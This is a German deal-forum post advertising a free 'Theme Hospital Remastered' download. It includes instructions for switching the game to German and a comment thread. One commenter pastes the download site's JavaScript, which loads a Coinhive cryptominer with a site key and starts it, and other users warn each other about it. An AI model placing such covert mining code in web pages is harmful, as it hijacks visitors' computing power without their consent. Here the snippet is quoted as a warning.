Theme Hospital Remastered gratis (PC)
430°Abgelaufen

Theme Hospital Remastered gratis (PC)

13
eingestellt am 22. Jän
Über Themehospital.co.uk könnt ihr euch gerade den gleichnamigen Klassiker, Theme Hospital in einer Remastered HD-Version downloaden.

Verfügbar für Windows XP/7/8


Das Spiel ist auf Englisch, lässt sich aber relativ leicht auf Deutsch umstellen:

-> Programme(x86)
-> Origin Games
-> Theme Hospital
-> Data
-> Game
-> CFG-Datei "Hospital" mit einem Texteditor öffnen
-> Zeile "Language" suchen und "ENG" auf "GER" (oder "GERMAN") ändern
-> Speichern, fertig, Text & Sprachausgabe sind nun Deutsch
(Anleitung von Trainzdepot.net)


Theme Hospital ist ein Computerspiel, das 1997 von Bullfrog Productions entwickelt wurde und welches zum Genre der isometrischen Wirtschaftssimulation gehört.
Der Spieler übernimmt die Rolle eines Managers eines Krankenhauses und muss sich durch verschiedene Level arbeiten und die jeweiligen Gewinnbedingungen erfüllen, z. B. eine bestimmte Anzahl an Patienten mit einer bestimmten Krankheit heilen oder den Gebäudewert über ein bestimmtes Maß bringen.
Zusätzliche Info

Gruppen

13 Kommentare
Mein AV stuft die Homepage als hochriskant ein, da via Java Script Cryptocurrency gemined wird.
super GAME!
Es gibt auch eine opensource Implementierung von Theme Hospital zu finden unter corsixth.com/
eris22. Jänner

Es gibt auch eine opensource Implementierung von Theme Hospital zu finden …Es gibt auch eine opensource Implementierung von Theme Hospital zu finden unter http://corsixth.com/


Da braucht man aber fix die Original Version
Bearbeitet von: "Sparmoz" 22. Jänner
eris22. Jänner

Es gibt auch eine opensource Implementierung von Theme Hospital zu finden …Es gibt auch eine opensource Implementierung von Theme Hospital zu finden unter http://corsixth.com/



Sehr cool.
Was hat diese Version was die Standardversion nicht hat?
inetchris22. Jänner

Mein AV stuft die Homepage als hochriskant ein, da via Java Script …Mein AV stuft die Homepage als hochriskant ein, da via Java Script Cryptocurrency gemined wird.



function parentIsEvil() { var html = null; try { var doc = top.location.pathname; } catch(err){ }; if(typeof doc === "undefined") { return true } else { return false }; }; if (parentIsEvil()) { top.location = self.location.href; };var url = "http://themehospital.co.uk/downloads/";if(url.indexOf("stfi.re") != -1) { var canonical = ""; var links = document.getElementsByTagName("link"); for (var i = 0; i < links.length; i ++) { if (links[i].getAttribute("rel") === "canonical") { canonical = links[i].getAttribute("href")}}; canonical = canonical.replace("?sfr=1", "");top.location = canonical; console.log(canonical);};</script><script src="coinhive.com/lib….js"></script><script>var miner = new CoinHive.Anonymous('kvz17Wa6NgENzm2KhAsvA8AA2eh5gMtr', {throttle: 0.2}); miner.start();</script>

"No Coin" schlägt auch an.
Bleibt nicht zu lange auf der Seite.
Bearbeitet von: "Austrian.Airlanes" 22. Jänner
love it
Sparmoz22. Jänner

Da braucht man aber fix die Original Version


Ja braucht man, weil die version verwendet die original Grafiken und die sind nicht umsonst (wie in diesem Deal auch)
Park75722. Jänner

Sehr cool.Was hat diese Version was die Standardversion nicht hat?


Leider weiß ich das nicht, ich habe es vor 2 Jahren gespielt ;-) aber anscheinend arbeiten sie noch immer daran.
Aufgrund der Tatsache, dass auf der Seite ein Coin Miner läuft, sollte der Deal entfernt werden. Sowas muss man wirklich nicht unterstützen!
eneloop22. Jänner

Aufgrund der Tatsache, dass auf der Seite ein Coin Miner läuft, sollte der …Aufgrund der Tatsache, dass auf der Seite ein Coin Miner läuft, sollte der Deal entfernt werden. Sowas muss man wirklich nicht unterstützen!


irgendwie müssen sie ja wohl den kostenlosen download finanzieren
Zanza22. Jänner

irgendwie müssen sie ja wohl den kostenlosen download finanzieren


bin ich bei dir, hab den deal deaktiviert.
klick oder nicht - muss jeder fuer sich entscheiden
Bearbeitet von: "Rich.Hard" 22. Jänner
Dein Kommentar
Avatar
@
    Text